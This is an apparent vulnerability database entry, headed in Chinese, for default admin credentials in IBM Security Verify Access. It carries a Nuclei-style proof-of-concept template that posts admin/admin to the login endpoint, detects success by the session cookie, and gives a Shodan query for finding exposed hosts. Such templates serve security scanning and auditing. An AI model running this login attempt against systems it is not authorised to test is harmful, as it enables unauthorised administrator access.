漏洞描述
IBM Security Verify Access default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
ibm-security-verify-default-login: IBM Security Verify Access - Default Login
PoC代码[已公开]
id: ibm-security-verify-default-login
info:
name: IBM Security Verify Access - Default Login
author: johnk3r
severity: high
description: |
IBM Security Verify Access default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
max-request: 2
shodan-query: title:"IBM Security Verify Access"
tags: ibm,default-login,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /core/j_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}&commit=&locale=en&_method=PUT
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers:
- type: dsl
dsl:
- "len(body) == 0"
- "status_code == 302"
- "contains(set_cookie, 'LtpaToken2')"
condition: and
# digest: 4a0a00473045022014f656da3cb74d5d1beba2f618e1e7c8ee04615dfda27107f0ed9a5a270ad43d02210090e034d695d1e01b179ea22ed93a32a610a4d23738ba73e182bf7ce5bc814ecd:922c64590222798bb761d5b6d8e72950